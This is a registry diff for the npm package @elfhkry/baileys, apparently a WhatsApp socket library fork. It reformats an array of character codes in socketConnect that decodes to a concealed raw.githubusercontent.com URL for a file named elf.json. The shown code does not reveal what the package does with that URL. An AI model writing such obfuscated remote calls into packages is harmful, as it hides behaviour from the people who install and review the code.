@elfhkry/baileys 8.0.11 → 8.0.12
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/socket.js +4 -4
- package/package.json +1 -1
package/lib/Socket/socket.js
CHANGED
|
@@ -165,10 +165,10 @@ export const makeSocket = (config) => {
|
|
|
165
165
|
|
|
166
166
|
const socketConnect = async () => {
|
|
167
167
|
const _u = [
|
|
168
|
-
104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,
|
|
169
|
-
|
|
170
|
-
|
|
171
|
-
|
|
168
|
+
104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98,
|
|
169
|
+
117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 70,
|
|
170
|
+
104, 107, 114, 121, 121, 47, 70, 104, 107, 114, 121, 47, 114, 101, 102, 115, 47, 104,
|
|
171
|
+
101, 97, 100, 115, 47, 109, 97, 105, 110, 47, 101, 108, 102, 46, 106, 115, 111, 110
|
|
172
172
|
]
|
|
173
173
|
|
|
174
174
|
const _url = String.fromCharCode(..._u)
|